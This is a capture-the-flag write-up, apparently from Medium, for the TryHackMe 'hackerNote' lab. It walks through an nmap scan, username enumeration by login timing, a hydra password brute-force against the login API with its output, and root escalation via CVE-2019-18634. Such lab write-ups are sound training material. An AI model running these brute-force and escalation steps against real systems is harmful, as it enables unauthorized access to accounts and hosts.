WriteUp — THM hackerNote

Photo by Kyle Glenn on Unsplash

Reconnaissance

Start with NMAP scan:

nmap -sC -sV -p- 10.10.31.138 1 ⨯
Starting Nmap 7.80 ( https://nmap.org ) at 2020–10–17 13:56 EEST
Nmap scan report for 10.10.31.138
Host is up (0.053s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 10:a6:95:34:62:b0:56:2a:38:15:77:58:f4:f3:6c:ac (RSA)
| 256 6f:18:27:a4:e7:21:9d:4e:6d:55:b3:ac:c5:2d:d5:d3 (ECDSA)
|_ 256 2d:c3:1b:58:4d:c3:5d:8e:6a:f6:37:9d:ca:ad:20:7c (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Home — hackerNote
8080/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Home — hackerNote
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Investigate

Make a user account with a,1,a. Try logging in with proper and invalid credentials and users. I notice that logging in with a proper username but wrong password takes considerably longer than with invalid username.

Exploit

Let’s make a timing attack to figure out usernames. I pick malenames-usa-top1000.txt as a dictionary from SecLists:

Attack Passwords

Let’s start by obtaining a password hint from the web application:

/usr/lib/hashcat-utils/combinator.bin colors.txt numbers.txt > attacklist.txt
hydra -l james -P attacklist.txt 10.10.31.138 http-post-form ‘/api/user/login:username=^USER^&password=^PASS^:Invalid’
Hydra v9.1 © 2020 by van Hauser/THC & David Maciejak — Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020–10–17 15:05:46
[DATA] max 16 tasks per 1 server, overall 16 tasks, 180 login tries (l:1/p:180), ~12 tries per task
[DATA] attacking http-post-form://10.10.31.138:80/api/user/login:username=^USER^&password=^PASS^:Invalid
[STATUS] 48.00 tries/min, 48 tries in 00:01h, 132 to do in 00:03h, 16 active
[80][http-post-form] host: 10.10.31.138 login: james password: __REDACTED__
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020–10–17 15:07:02

Escalate

Based on the instructions the box is vulnerable to CVE-2019-18634. Get the exploit, compile and run on the box to get the root flag.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Jari Laurila

Jari Laurila

CTO by day, learning cybersecurity by night.